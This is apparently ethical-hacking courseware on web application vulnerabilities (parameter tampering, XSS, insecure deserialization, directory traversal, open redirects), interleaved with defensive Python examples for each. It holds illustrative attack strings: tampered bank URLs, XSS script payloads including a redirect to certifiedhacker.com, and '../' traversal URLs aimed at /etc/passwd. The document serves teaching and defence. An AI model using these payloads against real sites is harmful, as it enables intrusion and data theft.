Slide summary: unprotected files and directories with read/write access; insufficient transport layer protection exposing data to untrusted parties, leading to theft.
Developers and network administrators should ensure that an entire application stack is configured properly; otherwise, security misconfiguration can occur at any level of the stack, including its platform, web server, application server, framework, and custom code. For instance, if the developer does not configure the server properly, it could result in various problems that can affect the site security. Problems that lead to such instances include unvalidated inputs, parameter/form tampering, improper error handling, insufficient transport layer protection, etc.
Unvalidated Inputs
Input validation flaws refer to a web application vulnerability whereby input from a client is not validated before being processed by web applications and backend servers. No validation or improper validation can make a web application vulnerable to various input validation attacks. If web applications implement input validation only on the client side, attackers can easily bypass it by tampering with the HTTP requests, URLs, headers, form fields, hidden fields, and query strings. Users' login IDs and other related data are stored in the cookies, which become a means of attack. An attacker exploits input validation flaws to perform cross-site scripting, buffer overflow, injection attacks, etc., resulting in data theft and system malfunction.
Figure 14.13: Unvalidated input attack
Parameter/Form Tampering
A web parameter tampering attack involves the manipulation of parameters exchanged between the client and the server to modify application data such as user credentials and permissions, prices, and quantities of products. This information is actually stored in cookies, hidden form fields, or URL query strings. The web application uses it to increase its functionality and control. A man-in-the-middle (MITM) attack is an example of this type of attack. Attackers use tools such as WebScarab and WebSploit Framework for these attacks.
Parameter tampering is a simple type of attack aimed directly at an application's business logic. It takes advantage of the fact that many programmers rely on hidden or fixed fields (such as a hidden tag in a form or a parameter in a URL) as the only security measure for certain operations. To bypass this security mechanism, an attacker can change these parameters. A parameter tampering attack exploits vulnerabilities in integrity and logic validation mechanisms that may result in XSS, SQL injection, etc.
Detailed Description:
After a session is established between the web application and the user, an exchange of parameters between the web browser and the web application takes place to maintain information about a client's session, which eliminates the need to maintain a complex database on the server side. A web application uses URL queries, form fields, and cookies to pass these parameters.
Changing parameters in the form field is the best example of parameter tampering. When a user selects an HTML page, it is stored as a form field value and transferred as an HTTP page to the web application. These values may be pre-selected (combo box, checkbox, radio buttons, etc.), free text, or hidden. An attacker can manipulate these values. In some extreme cases, the attack involves saving the page, editing the HTML, and reloading the page in the web browser.
Hidden fields that are invisible to the end user provide information status to the web application. For example, consider a product order form that includes the following hidden field:
<input type="hidden" name="price" value="99.90">
Combo boxes, checkboxes, and radio buttons are examples of pre-selected parameters used to transfer information between different pages while allowing the user to select one of several predefined values. In a parameter tampering attack, an attacker may manipulate these values.
http://www.certifiedhackerbank.com/cust.asp?profile=21&debit=2500
The attacker may change the URL parameters (profile and debit) to debit another account:
http://www.certifiedhackerbank.com/cust.asp?profile=82&debit=1500
The attacker can modify other URL parameters, including attribute parameters and internal modules. Attribute parameters are unique parameters that characterize the behavior of the uploading page. For example, consider a content-sharing web application that enables the content creator to modify the content, while other users can only view the content. The web server checks whether the user who is accessing an entry is the author or not (usually via cookies). An ordinary user will request the following link
http://www.certifiedhackerbank.com/stat.asp?pg=531&status=view
The attacker can modify the status parameter to "delete" to delete permission for the content.
http://www.certifiedhackerbank.com/stat.asp?pg=147&status=delete
Parameter/form tampering can lead to theft of services, escalation of access, session hijacking, and assuming the identity of other users, as well as parameters that grant access to the developer and debugging information.
Figure 14.14: Parameter tampering attack example
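Every tampering case above (the hidden price, the profile/debit pair, the status flag) has the same root cause: the server treats a client-supplied value as authoritative. The following added example (not the courseware's code) shows the server-side handling that removes the class of bug: prices come from the catalogue, and the profile in the URL is checked against the authenticated user. The catalogue, account table and SKU are constructed.

```python
from decimal import Decimal

# Constructed server-side state: the only legitimate source of prices and account ownership.
CATALOGUE = {"SKU-304": Decimal("99.90")}
ACCOUNT_OWNER = {21: "alice", 82: "bob"}


class TamperingRejected(ValueError):
    pass


def price_order(form: dict) -> Decimal:
    """Compute the order total from the catalogue; any 'price' field the client sends is ignored."""
    sku = form.get("sku")
    if sku not in CATALOGUE:
        raise TamperingRejected(f"unknown sku {sku!r}")
    try:
        qty = int(form.get("qty", "1"))
    except ValueError:
        raise TamperingRejected("quantity is not an integer")
    if not 1 <= qty <= 100:                    # business limit; stops negative or absurd quantities
        raise TamperingRejected("quantity out of range")
    return CATALOGUE[sku] * qty


def debit_account(session_user: str, query: dict) -> str:
    """Authorise the 'profile' parameter against the session's user instead of trusting the URL."""
    try:
        profile = int(query["profile"])
        amount = Decimal(query["debit"])
    except (KeyError, ValueError, ArithmeticError):   # Decimal raises InvalidOperation (ArithmeticError)
        raise TamperingRejected("malformed profile/debit parameters")
    if ACCOUNT_OWNER.get(profile) != session_user:
        raise TamperingRejected(f"user {session_user!r} does not own profile {profile}")
    if amount <= 0:
        raise TamperingRejected("debit must be positive")
    return f"debited {amount} from profile {profile}"


def outcome(fn, *args) -> str:
    """Render the handler result the way an access log would record it."""
    try:
        return str(fn(*args))
    except TamperingRejected as e:
        return f"rejected: {e}"
```

The tampered hidden field `price=0.01` has no effect because it is never read, and the `profile=82` URL from the text is refused for a session belonging to alice, so the change of account number never reaches the ledger.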
Improper Error Handling
It is necessary to define how a system or network should behave when an error occurs. Otherwise, the error may provide a chance for an attacker to break into the system. Improper error handling may lead to DoS attacks.
Improper error handling provides insights into the source code, such as logic flaws and default accounts, which the attacker can exploit. Using the information received from an error message, an attacker identifies vulnerabilities for launching various web application attacks. Improper exception handling occurs when web applications do not limit the amount of information they return to their users. Information leakage may include helpful error messages and service banners. Developers and system administrators often forget or disregard how an attacker can use something as simple as a server banner. The attacker will start searching for a place to identify vulnerabilities and attempt to leverage information that applications freely volunteer.
Figure 14.15: Screenshot displaying improper errors
The attacker can gather the following information from improper error handling:
+ Null pointer exceptions
+ System call failure
+ Database unavailable
+ Network timeout
+ Database information
+ Web application logical flow
+ Application environment
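The pattern that prevents every item in that list from reaching the client is a single last-resort handler: full detail to the server log under a reference id, a fixed generic body to the user. The following is an added example (not the courseware's code); the response shape, the reference-id format and the leak markers are assumptions.

```python
import logging
import traceback
import uuid

log = logging.getLogger("app.errors")

GENERIC_BODY = "An internal error occurred. Please quote reference {ref} when contacting support."


def handle_exception(exc: BaseException) -> dict:
    """Build the client-facing response for an unhandled exception.

    The stack trace, exception type and message go to the server log keyed by a
    reference id; the client receives only the id, which support can correlate."""
    ref = uuid.uuid4().hex[:12]
    detail = "".join(traceback.format_exception(type(exc), exc, exc.__traceback__))
    log.error("ref=%s unhandled exception:\n%s", ref, detail)
    return {
        "status": 500,
        "headers": {"Content-Type": "text/plain"},   # no Server / X-Powered-By banner emitted
        "body": GENERIC_BODY.format(ref=ref),
    }


def leaks_internals(body: str) -> bool:
    """Test-time heuristic: does a response body carry stack-trace or driver detail?"""
    markers = ("Traceback", 'File "', "ORA-", "SQLSTATE", "NullPointerException", "at java.")
    return any(m in body for m in markers)


def demo() -> dict:
    try:
        {}["account"]          # constructed failure standing in for a backend fault
    except KeyError as e:
        return handle_exception(e)
```

Pair this with a production setting that disables framework debug pages; the handler cannot help if the framework answers first with its own stack dump.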
Insufficient Transport Layer Protection
Insufficient transport layer protection is a security flaw that occurs when an application fails to protect sensitive traffic flowing in a network. It supports weak algorithms and uses expired or invalid certificates. Developers should use SSL/TLS authentication for authentication on the websites; otherwise, an attacker can monitor the network traffic. Unless communication between websites and clients is encrypted, data can be intercepted, injected, or redirected. An underprivileged SSL setup can also help the attacker launch phishing and MITM attacks. System compromise may lead to various other threats such as account theft, phishing attacks, and compromised admin accounts. Thus, insufficient transport layer protection may allow untrusted third parties to obtain unauthorized access to sensitive information. All this occurs when applications support weak algorithms used for SSL and when they use expired or invalid SSL certificates or do not use them correctly.
Example
Assume that a user logs into an online banking application that possesses insufficient transport layer protection (i.e., it is not SSL encrypted). The sensitive data in the communication (e.g., session ID) can be vulnerable to attack during transit in plaintext format. This allows an attacker to steal such data to perform various types of attacks on the application.
Some server configuration problems are as follows:
+ Server software flaws
+ Enabling unnecessary services
+ Improper authentication
+ Unpatched security flaws
+ Server configuration problems
Automated scanners help to detect a few of these problems.
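The transport layer example above (a session ID crossing the wire in the clear) has a configuration-level answer on both ends: a TLS context that verifies the peer and refuses legacy protocol versions, and a session cookie flagged so the browser never sends it over plain HTTP. The following is an added example (not the courseware's code) that builds the weak and the hardened client context side by side and audits them; the cookie attributes are the usual recommended set, chosen here as an assumption.

```python
import ssl


def weak_client_context() -> ssl.SSLContext:
    """The misconfiguration described above: certificate not verified, hostname not checked,
    protocol floor left at whatever the library still supports."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before verify_mode can be CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE     # any certificate, expired or forged, is accepted
    return ctx


def hardened_client_context() -> ssl.SSLContext:
    """create_default_context loads the system CA store, requires a valid chain and checks
    the hostname; the minimum version is pinned so SSLv3 / TLS 1.0 / TLS 1.1 are refused."""
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def audit_context(ctx: ssl.SSLContext) -> list:
    """Return the findings an automated scanner would raise against a context."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("server certificate not verified")
    if not ctx.check_hostname:
        findings.append("hostname not checked against certificate")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("legacy TLS versions accepted")
    return findings


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value for the session: Secure keeps it off plaintext HTTP, HttpOnly keeps it
    away from page scripts, SameSite limits cross-site sends (assumed policy: Lax)."""
    return f"sessionid={session_id}; Path=/; Secure; HttpOnly; SameSite=Lax"


def audit_cookie(header: str) -> list:
    attrs = {part.strip().lower() for part in header.split(";")[1:]}
    return [f"missing {flag}" for flag in ("secure", "httponly") if flag not in attrs]
```

On the server side the equivalent is the listener's configuration (certificate chain, minimum protocol, cipher list) plus an HTTP-to-HTTPS redirect and HSTS, so that a first request typed without the scheme never carries a cookie in the clear.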
Attackers can access default accounts, unused pages, unpatched flaws, unprotected files and directories, and so on to gain unauthorized access. The person responsible should take care of all such unnecessary and unsafe features. Disabling them completely would prove to be highly beneficial, preventing outsiders from using them for malicious attacks. To avoid leakage of crucial information to attackers, the network administrator should thus take care of all application-based files through proper authentication and strong security methods. For example, if the application server admin console is automatically installed and not removed, and the default accounts are not changed, then the attacker discovers the standard admin pages on the server, logs in with default passwords, and establishes control over the server.
A7 - Cross-Site Scripting (XSS) Attacks
XSS attacks are used for:
+ Exploiting user privileges
+ Ads in hidden IFRAMEs and pop-ups
+ Data theft
+ Intranet probing
+ Data manipulation
+ Keylogging and remote monitoring
How XSS Attacks Work
A web page consists of text and HTML markup created by the server and obtained by the client browser. Servers can control the client's interpretation of the statically generated pages, but they cannot completely control the client's interpretation of the output of the page generated dynamically by the servers. Thus, if the attacker inserts untrusted content into a dynamic page, neither the server nor the client recognizes it. Untrusted input can come from URL parameters, form elements, cookies, database queries, and so on.
If the dynamic data inserted by the web server contains special characters, the user's web browser will mistake them for HTML markup, as it treats some characters as special to distinguish text from markup. Thus, an attacker can choose the data inserted into the generated page and mislead the user's browser into running the attacker's script. As the malicious scripts will execute in the browser's security context for communicating with the legitimate web server, the attacker will have complete access to the document retrieved and may send the data in the page back to his/her site.
Note: Check the CEH Tools, Module 14: Hacking Web Applications, for the XSS cheat sheet.
Cross-Site Scripting Attack Scenario: Attack via Email
In a cross-site scripting attack that employs email, the attacker crafts an email that contains a link to the malicious script and sends it to the victim, luring the victim into clicking the link containing the malicious script/query. For example, if the attacker finds a cross-site scripting vulnerability on the bank.com website, he/she constructs a link embedded with a malicious script such as
<A HREF=http://bank.com/registration.cgi?clientprofile=<SCRIPT>maliciouscode</SCRIPT>>Click here</A>
and sends an email to the target user. When the user clicks the link, the URL is sent to bank.com with the malicious code. The legitimate server hosting the bank.com website sends a page back to the user including the value of clientprofile, and the malicious code is executed on the client machine. The malicious code asks the victim to enter profile information. After the user enters all the necessary personal details and clicks Submit, the attacker receives the information. The attacker can use these details to impersonate the user to gain access to the user's online bank account and perform other fraudulent activities.
Figure 14.17: XSS attack via email
XSS Example: Attack via Email
Figure 14.18: XSS example attack via email
XSS Example: Stealing Users' Cookies
Figure 14.19: XSS example stealing users' cookies
XSS Example: Sending an Unauthorized Request
Figure 14.20: XSS example sending an unauthorized request
XSS Attack in Blog Posting
The attacker finds an XSS vulnerability in the techpost.org website, constructs a malicious script
<script>onload=window.location='http://www.certifiedhacker.com'</script>
and adds it in the comment field of TechPost. This malicious script posted by the attacker is stored on the web application database server and runs in the background. When a user visits the TechPost website, the malicious script injected by the attacker in the TechPost comment field activates and redirects the user to the malicious website certifiedhacker.com.
XSS Attack in Comment Field
Many web applications use HTML pages that dynamically accept data from different sources. One can change the data in the HTML pages according to the request. Attackers use HTML web page tags to manipulate malicious data. They launch an attack by changing the comments feature using a script. When the target sees the comment and activates it, then the target browser executes the malicious script to accomplish the attacker's goals.
For example, an attacker finds a vulnerable comment field in the TechPost.org website. Thus, he constructs the malicious script "<script>alert("Hello World")</script>" and adds it along with his comment in the comment field of TechPost. This malicious script, along with the comment posted by the attacker in the comment field, is stored on the web application's database server. When a user visits the TechPost website, the coded message "Hello World" pops up whenever the web page is loaded. Therefore, when the user clicks OK in the pop-up window, the attacker can gain access to the user's browser and subsequently perform malicious activities.
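Both stored-XSS scenarios (the blog redirect and the comment-field pop-up) succeed only because the comment text is copied into the page unchanged. The following added example (not the courseware's code) shows the vulnerable rendering next to context-aware output encoding for the text and attribute positions, plus the response headers that contain the damage if an encoding step is ever missed. The stored comments are constructed and include the page's own "Hello World" payload.

```python
import html

# Constructed comments as the application would read them back from its database.
# The second is the page's own example; the third shows that encoding, not tag filtering, is the fix.
STORED_COMMENTS = [
    "Great write-up, thanks!",
    '<script>alert("Hello World")</script>',
    "<img src=x onerror=alert(1)>",
]


def render_comment_vulnerable(comment: str) -> str:
    """The TechPost pattern: untrusted text pasted straight into the HTML."""
    return f"<li>{comment}</li>"


def render_comment_safe(comment: str) -> str:
    """HTML text-node context: < > & " ' become entities, so the browser shows the script
    as literal text instead of executing it."""
    return f"<li>{html.escape(comment, quote=True)}</li>"


def render_link_safe(url: str, label: str) -> str:
    """HTML attribute context: encode for the attribute and allow only http(s) schemes,
    since attribute encoding alone does not stop a javascript: URL from running."""
    if not url.lower().startswith(("http://", "https://")):
        url = "#"
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(label)}</a>'


def security_headers() -> dict:
    """Defence in depth: with this CSP the browser refuses inline script even if an
    encoding mistake lets a <script> tag into the page. Policy values are an assumption."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "X-Content-Type-Options": "nosniff",
    }


def render_page(comments) -> str:
    return "<ul>" + "".join(render_comment_safe(c) for c in comments) + "</ul>"
```

Encoding belongs at output time, chosen per context (text node, attribute, URL, JavaScript string); stripping tags on input is brittle because the same stored value may later be emitted in a context the filter did not anticipate.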
A8 - Insecure Deserialization
Figure 14.23: Serialization process
Deserialization
Deserialization is the reverse process of serialization, whereby the object data is recreated from the linear serialized data. Due to the process of deserialization, the serialized Employee object given in the abovementioned example will be reconverted into the object data as shown in the figure below:
<Employee><Name>Rinni</Name><Age>26</Age><City>Nevada</City><EmpID>2201</EmpID></Employee>
Figure: Deserialization process
Insecure Deserialization
This process of serialization and deserialization is effectively used in communication between networks, and its widespread usage attracts attackers to exploit the flaws in this process. Attackers inject malicious code into serialized linear formatted data and forward the malicious serialized data to the victim. An example of malicious code injection into serialized linear data by the attacker is shown below:
<Employee><Name>Rinni</Name><Age>26</Age><City>Nevada</City><EmpID>2201</EmpID>MALICIOUS PROCEDURE</Employee>
Due to insecure deserialization, the injected malicious code will be undetected and remain present in the final execution of the deserialization code. This results in the execution of malicious procedures along with the execution of serialized data, as shown in the following figure:
Figure 14.25: Insecure deserialization attack
This could have a severe impact on the system, as it would authorize the attacker to execute and run systems remotely. Moreover, any software or server vulnerable to deserialization attacks could be adversely affected.
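The safe form of deserialization is the opposite of a generic object reconstructor: the receiver knows exactly which record it expects and rebuilds only that, rejecting anything extra. The following added example (not the courseware's code) rebuilds the page's Employee record from its XML form with a strict schema, so the appended "MALICIOUS PROCEDURE" text from the tampered sample is refused rather than carried along. The Employee field set is taken from the page; the validation rules are assumptions. The same principle rules out format-level deserializers such as Python's `pickle` for untrusted input, because they reconstruct whatever object graph the bytes describe.

```python
import xml.etree.ElementTree as ET
from dataclasses import dataclass


@dataclass(frozen=True)
class Employee:
    name: str
    age: int
    city: str
    emp_id: int


EXPECTED_FIELDS = ("Name", "Age", "City", "EmpID")   # the only children an Employee may carry


class UnsafeRecord(ValueError):
    pass


def deserialize_employee(xml_text: str) -> Employee:
    """Rebuild an Employee from serialized XML, accepting only the declared schema.

    Unknown elements, attributes, nested markup and stray text (which is where the
    page's MALICIOUS PROCEDURE sits) are all rejected before any value is used."""
    if "<!DOCTYPE" in xml_text or "<!ENTITY" in xml_text:
        raise UnsafeRecord("DTD constructs are not permitted")
    root = ET.fromstring(xml_text)
    if root.tag != "Employee" or root.attrib:
        raise UnsafeRecord(f"unexpected root {root.tag!r}")
    if (root.text or "").strip():
        raise UnsafeRecord("stray text inside <Employee>")
    fields = {}
    for child in root:
        if child.tag not in EXPECTED_FIELDS or child.tag in fields:
            raise UnsafeRecord(f"unexpected or duplicate element {child.tag!r}")
        if child.attrib or len(child):
            raise UnsafeRecord(f"element {child.tag!r} must be a plain value")
        if (child.tail or "").strip():               # text after a closing tag is never legitimate here
            raise UnsafeRecord(f"stray text after </{child.tag}>")
        fields[child.tag] = (child.text or "").strip()
    if set(fields) != set(EXPECTED_FIELDS):
        raise UnsafeRecord("missing fields")
    if not fields["Age"].isdigit() or not fields["EmpID"].isdigit():
        raise UnsafeRecord("Age and EmpID must be unsigned integers")
    return Employee(fields["Name"], int(fields["Age"]), fields["City"], int(fields["EmpID"]))


# The page's clean record and its tampered counterpart, as constructed test inputs.
CLEAN = "<Employee><Name>Rinni</Name><Age>26</Age><City>Nevada</City><EmpID>2201</EmpID></Employee>"
TAMPERED = ("<Employee><Name>Rinni</Name><Age>26</Age><City>Nevada</City>"
            "<EmpID>2201</EmpID>MALICIOUS PROCEDURE</Employee>")


def try_deserialize(xml_text: str) -> str:
    try:
        return repr(deserialize_employee(xml_text))
    except (UnsafeRecord, ET.ParseError) as e:
        return f"rejected: {e}"
```

The record is rebuilt into a plain data object with no behaviour attached; nothing in the input can select a class, a method or a code path, which is the property insecure deserializers lack.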
A9 - Using Components with Known Vulnerabilities
Components run with full privileges, and flaws in any component can result in serious impact. Attackers identify vulnerable components by scanning dependencies or by performing manual analysis, using sources such as Exploit Database (https://www.exploit-db.com) and SecurityFocus (https://www.securityfocus.com). If a vulnerable component is present, the attacker exploits it.
Figure 14.26: Attack on a web application with known vulnerable components
Figure 14.27: Screenshot displaying Exploit Database search results for web application exploits
A10 - Insufficient Logging and Monitoring
Web applications maintain logs to track usage patterns, such as user login credentials and admin login credentials. Insufficient logging and monitoring refer to scenarios in which the detection software either does not record the malicious event or ignores the important details about the event. Attackers usually inject, delete, or tamper with the web application logs to engage in malicious activities or hide their identities. Due to insufficient logging and monitoring, the detection of malicious attempts becomes more difficult and the attacker can perform malicious attacks, such as password brute-forcing, to steal confidential passwords.
Figure 14.28: Attack on a web application with insufficient logging and monitoring
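The brute-forcing case above is only detectable if each authentication outcome is logged with its source and timestamp, and the logs are then actually read. The following is an added example (not the courseware's code) of the detection side: a sliding-window count of failed logins per source address over constructed log lines, which also flags a success that follows a burst of failures. The log format, the threshold and the window are assumptions; the addresses are from documentation ranges.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed authentication log in the assumed format
# "<ISO timestamp> <event> user=<name> src=<ip>"; one burst against admin, two stray
# failures from alice far apart in time.
SAMPLE_LOG = """\
2020-11-03T09:12:01 LOGIN_FAILED user=admin src=203.0.113.45
2020-11-03T09:12:03 LOGIN_FAILED user=admin src=203.0.113.45
2020-11-03T09:12:04 LOGIN_FAILED user=admin src=203.0.113.45
2020-11-03T09:12:06 LOGIN_FAILED user=admin src=203.0.113.45
2020-11-03T09:12:07 LOGIN_FAILED user=admin src=203.0.113.45
2020-11-03T09:12:09 LOGIN_OK user=admin src=203.0.113.45
2020-11-03T09:30:00 LOGIN_FAILED user=alice src=198.51.100.7
2020-11-03T10:45:00 LOGIN_FAILED user=alice src=198.51.100.7
"""

THRESHOLD = 5                   # failures from one source ...
WINDOW = timedelta(minutes=5)   # ... within this window raise an alert (assumed policy)


def parse_line(line: str):
    ts, event, user_kv, src_kv = line.split()
    return datetime.fromisoformat(ts), event, user_kv.split("=", 1)[1], src_kv.split("=", 1)[1]


def detect_bruteforce(log_text: str) -> list:
    """Sliding-window failure count per source IP, plus 'success after burst' correlation.

    The second signal matters most: a burst followed by LOGIN_OK is the signature of a
    guess that worked, and is what an analyst needs to see first."""
    failures = defaultdict(deque)   # src -> timestamps of recent failures
    alerted = set()
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, event, user, src = parse_line(line)
        q = failures[src]
        if event == "LOGIN_FAILED":
            q.append(ts)
            while q and ts - q[0] > WINDOW:       # drop failures that fell out of the window
                q.popleft()
            if len(q) >= THRESHOLD and src not in alerted:
                alerted.add(src)
                alerts.append(f"{ts.isoformat()} BRUTE_FORCE src={src} failures={len(q)} last_user={user}")
        elif event == "LOGIN_OK" and src in alerted:
            alerts.append(f"{ts.isoformat()} SUCCESS_AFTER_BRUTE_FORCE src={src} user={user}")
    return alerts
```

Because attackers tamper with logs they can reach, the lines this runs over should be shipped off the web host to a write-once collector as they are produced; detection logic on a log the attacker can edit is detection the attacker can switch off.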
Other Web Application Threats
Web application threats are not limited to attacks based on URL and port 80. Despite using ports, protocols, and OSI layers, vendors must protect the integrity of mission-critical applications from all possible future attacks by being able to deal with attack methods. The various types of web application threats are as follows:
+ Directory Traversal
Attackers exploit HTTP by directory traversal, which gives them access to restricted directories; they execute commands outside the web server's root directory.
+ Unvalidated Redirects and Forwards
Attackers lure victims into clicking on unvalidated links that appear to be legitimate. Such redirects may attempt to install malware or trick victims into disclosing passwords or other sensitive information. Unsafe forwards may allow access control bypass, leading to
+ Session Fixation Attack
+ Security Management Exploits
+ Failure to Restrict URL Access
+ Malicious File Execution
+ Watering Hole Attack
It is a type of unvalidated redirect attack whereby the attacker first identifies the most visited website of the target, determines the vulnerabilities in the website, injects malicious code into the vulnerable web application, and then waits for the victim to browse the website. Once the victim tries to access the website, the malicious code executes, infecting the victim.
+ Cross-Site Request Forgery
The cross-site request forgery method is a type of attack in which an authenticated user is made to perform certain tasks on the web application that an attacker chooses, e.g., a user clicking on a particular link sent through an email or chat.
+ Cookie/Session Poisoning
+ Broken Session Management
If session IDs are exposed in the URL, then web applications are vulnerable to session fixation attacks. Furthermore, if the session timeout is longer and the session IDs are not changed after every login, attackers may hijack the session and take control of the session with the same privileges as the victim.
+ Broken Account Management
Vulnerable account management functions, including account update, forgotten or lost password recovery, reset password, and other similar functions, might weaken valid authentication schemes.
+ Denial-of-Service (DoS)
A DoS attack is an attack on the availability of a service, which reduces, restricts, or prevents access to system resources by its legitimate users. For instance, a website related to a banking or email service may not be able to function for a few hours or even days, resulting in the loss of time and money.
+ Buffer Overflow
A web application's buffer overflow vulnerability occurs when it fails to guard its buffer properly and allows writing beyond its maximum size.
+ CAPTCHA Attacks
CAPTCHA is a challenge-response type of test implemented by web applications to check whether the response is generated by a computer. Although CAPTCHAs are designed to be unbreakable, they are prone to various types of attacks.
+ Platform Exploits
Users can build various web applications using different platforms such as BEA Weblogic and Cold Fusion. Each platform has various vulnerabilities and exploits associated with it.
+ Network Access Attacks
Network access attacks can majorly affect web applications, including a basic level of service. They can also allow levels of access that standard HTTP application methods cannot grant.
+ DMZ Protocol Attacks
The demilitarized zone (DMZ) is a semi-trusted network zone that separates the untrusted Internet from the company's trusted internal network. An attacker who can compromise a system that allows other DMZ protocols has access to other DMZs and internal systems. This level of access can lead to
  + Compromise of the web application and data
  + Defacement of websites
  + Access to internal systems, including databases, backups, and source code
+ Web-based Timing Attacks
Web-based timing attacks exploit side-channel leakage and estimate the amount of time taken for secret key operations and passwords. Attackers perform these attacks to retrieve usernames and passwords for accessing web applications.
+ MarioNet Attack
Attackers abuse the Service Workers API to inject and run malicious code in the victim's browser to perform various attacks such as cryptojacking, DDoS, click fraud, and distributed password cracking.
+ RC4 NOMORE Attack
A Rivest Cipher Numerous Occurrence MOnitoring and Recovery Exploit (RC4 NOMORE) attack is an attack against the RC4 stream cipher. This attack exploits the vulnerabilities present in a web server that uses the RC4 encryption algorithm for accessing encrypted sensitive information. Attackers use RC4 NOMORE to decrypt the web cookies secured by the HTTPS protocol and inject arbitrary packets. After stealing a valid cookie, the attacker impersonates the victim and logs into the website using the victim's credentials to perform malicious activities and unauthorized transactions.
+ Clickjacking Attack
In clickjacking, the attacker loads the target website inside a low opacity iframe. Then, the attacker designs a page such that all the clickable items such as buttons are positioned exactly as on the selected target website. When the victim clicks on the invisible elements, the attacker performs various malicious actions.
+ JavaScript Hijacking
JavaScript hijacking, also known as JSON hijacking, is a vulnerability that enables attackers to capture sensitive information from systems using JavaScript Object Notation (JSON) as a data carrier. These vulnerabilities arise from flaws in the web browser's same-origin policy that permits a domain to add code from another domain.
+ DNS Rebinding Attack
Attackers perform DNS rebinding attacks to bypass the same-origin policy's security constraints and communicate with or make arbitrary requests to local domains through a malicious web page.
Directory Traversal
When access is provided outside a defined application, there exists the possibility of unintended information disclosure or modification. Complex applications are configured with multiple directories that exist as application components and data. An application can traverse these directories to locate and execute the legitimate portions of an application. A directory traversal/forceful browsing attack occurs when the attacker is able to browse the directories and files outside the normal application access. Such an attack exposes the directory structure of an application and often the underlying web server and operating system. Directory traversal allows attackers to access restricted directories, including application source code, configuration, and critical system files, and execute commands outside the web server's root directory.
With this level of access to web application architecture, an attacker can
+ Enumerate the contents of files and directories
+ Access pages that otherwise require authentication (and possibly payment)
+ Gain secret knowledge of the application and its construction
+ Discover user IDs and passwords stored in hidden files
+ Locate source code and other interesting files left on the server
+ View sensitive data such as customer information
Example:
The following example uses "../" to go back several directories and obtain the file containing the backup of a web application
http://www.targetsite.com/../../../sitebackup.zip
This example obtains the "/etc/passwd" file from a UNIX/Linux system, which contains user account information
http://www.targetsite.com/../../../../etc/passwd
Let us consider another example in which an attacker tries to access files located outside a web publishing directory using directory traversal
http://www.certifiedhacker.com/process.aspx?page=../../../../somedir/somefile
http://www.certifiedhacker.com/../../../../somedir/somefile
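The three URLs above share one defence: resolve the requested name against the web root and refuse anything whose canonical path lands outside it, after decoding. The following is an added example (not the courseware's code) of such a check, exercised against the page's own traversal strings plus a percent-encoded variant; the web root is a temporary directory created for the demonstration.

```python
import os
from pathlib import Path
from urllib.parse import unquote


class TraversalRejected(ValueError):
    pass


def safe_resolve(web_root: str, requested: str) -> str:
    """Map a URL path such as 'reports/q1.pdf' onto web_root, refusing anything that escapes it.

    Decodes percent-encoding first (so %2F and %2E sequences are judged as the filesystem
    would see them), treats a leading slash as relative to the root, canonicalises ../ and
    symlinks with resolve(), and then checks containment on the canonical form."""
    decoded = unquote(requested)
    if "\x00" in decoded:
        raise TraversalRejected("NUL byte in path")
    root = Path(web_root).resolve()
    candidate = (root / decoded.lstrip("/\\")).resolve()
    if candidate != root and root not in candidate.parents:
        raise TraversalRejected(f"path escapes web root: {requested!r}")
    return str(candidate)


def check(web_root: str, requested: str) -> str:
    """Summarise a request the way an access log would record the decision."""
    try:
        resolved = safe_resolve(web_root, requested)
        return "allowed:" + os.path.relpath(resolved, str(Path(web_root).resolve()))
    except TraversalRejected:
        return "rejected"


def demo() -> dict:
    """Run the page's traversal examples and two benign requests against a scratch web root."""
    import tempfile
    root = tempfile.mkdtemp()            # stands in for the server's document root
    requests = [
        "sitebackup.zip",                 # legitimate file inside the root
        "docs/../index.html",             # ../ that stays inside the root is fine
        "../../../sitebackup.zip",        # the page's first example
        "../../../../etc/passwd",         # the page's second example
        "..%2F..%2F..%2Fetc%2Fpasswd",    # same thing, percent-encoded
    ]
    return {r: check(root, r) for r in requests}
```

The check is on the canonical path, not on the presence of ".." in the string; string filters miss encodings and redundant separators, whereas containment after `resolve()` is a property of where the path actually points.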
Unvalidated Redirects and Forwards
Unvalidated redirects enable attackers to install malware or trick victims into disclosing passwords or other sensitive information, whereas unsafe forwards may allow access control bypass. An attacker sends links to unvalidated redirects and lures the victim into clicking on them. When the victim clicks on the link, thinking that it is a valid site, it redirects
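The redirect in that scenario works because the application forwards the browser to whatever destination the link carried. The following is an added example (not the courseware's code) of the server-side validation that removes the open redirect: the destination parameter is accepted only as a local path or as an HTTPS URL on an allowlisted host, and anything else falls back to a fixed landing page. The allowlisted host (the page's www.certifiedhacker.com), the default landing page and the test URLs are constructed.

```python
from urllib.parse import urlsplit, urlunsplit

ALLOWED_HOSTS = {"www.certifiedhacker.com"}   # the application's own host(s); constructed allowlist
DEFAULT_LANDING = "/account"                   # where to send the user when the target is not trusted


def safe_redirect_target(next_param: str) -> str:
    """Return a redirect target that stays on our own site, or the default landing page.

    Accepts a site-relative path or an absolute https URL whose host is allowlisted.
    The parsed components are re-assembled so that nothing but path and query survives."""
    if not next_param:
        return DEFAULT_LANDING
    parts = urlsplit(next_param.strip())
    if "\\" in parts.path:                        # some browsers treat a backslash as a slash
        return DEFAULT_LANDING
    if parts.scheme == "" and parts.netloc == "":
        # Relative target: one leading slash only; "//host" would be a scheme-relative URL
        if parts.path.startswith("/") and not parts.path.startswith("//"):
            return urlunsplit(("", "", parts.path, parts.query, ""))
        return DEFAULT_LANDING
    # Absolute target: hostname (not netloc) so "trusted@evil" userinfo tricks resolve to evil
    if parts.scheme == "https" and parts.hostname in ALLOWED_HOSTS:
        return urlunsplit(("https", parts.hostname, parts.path or "/", parts.query, ""))
    return DEFAULT_LANDING
```

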